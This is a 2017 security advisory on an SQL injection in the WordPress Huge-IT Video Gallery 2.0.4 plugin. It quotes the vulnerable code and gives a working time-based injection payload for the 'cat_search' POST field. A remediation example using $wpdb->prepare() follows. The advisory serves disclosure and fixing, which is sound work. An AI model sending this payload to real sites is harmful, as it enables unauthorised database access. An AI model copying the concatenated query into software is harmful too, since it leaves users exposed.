WordPress Huge-IT Video Gallery 2.0.4 SQL Injection

  • 2017-05-30

Advisory ID: DC-2017-01-009
SQL injection

  Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:         http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC)
  File:                   gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118    $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix . "huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------
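The root cause is visible in lines 107 and 118: sanitize_text_field() only strips tags, control characters and surrounding whitespace, it does not make a value safe to concatenate into SQL, and the value is appended to an unquoted numeric comparison, so the request body above becomes part of the query. As an added example, not part of the advisory or of the plugin's code, the same count query written with $wpdb->prepare() so that cat_search is bound as an integer instead of concatenated. The function name dc_example_count_galleries and the "WHERE 1=1" base clause are assumptions; the table and column names follow the advisory.

```php
<?php
// Added example, not the plugin's code: the gallery count query with the
// category filter bound through $wpdb->prepare() instead of string concatenation.
// Assumes it runs inside WordPress, where $wpdb and absint() are available.

function dc_example_count_galleries( $wpdb, $cat_search ) {
    // sl_width is compared numerically, so coerce the input to a non-negative
    // integer. A value such as "DefenseCode AND (SELECT ...)" becomes 0 and the
    // filter is simply skipped; no SQL from the request ever reaches the query.
    $cat_id = absint( $cat_search );

    $table = $wpdb->prefix . 'huge_it_videogallery_galleries';
    $sql   = "SELECT COUNT(*) FROM {$table} WHERE 1=1"; // base clause is an assumption
    $args  = array();

    if ( $cat_id > 0 ) {
        // %d is an integer placeholder; prepare() casts the argument, it never
        // interpolates the raw string.
        $sql   .= ' AND sl_width = %d';
        $args[] = $cat_id;
    }

    // prepare() warns when called without placeholders, so only call it
    // when there is something to bind.
    $query = $args ? $wpdb->prepare( $sql, $args ) : $sql;

    return (int) $wpdb->get_var( $query );
}

// Usage at the point where the advisory's line 107 reads the request:
// $total = dc_example_count_galleries( $wpdb, isset( $_POST['cat_search'] ) ? $_POST['cat_search'] : '' );
```

The same pattern applies to any other fragment appended to $where: each user-controlled value goes into $args with a %d or %s placeholder, and the query string itself never contains request data.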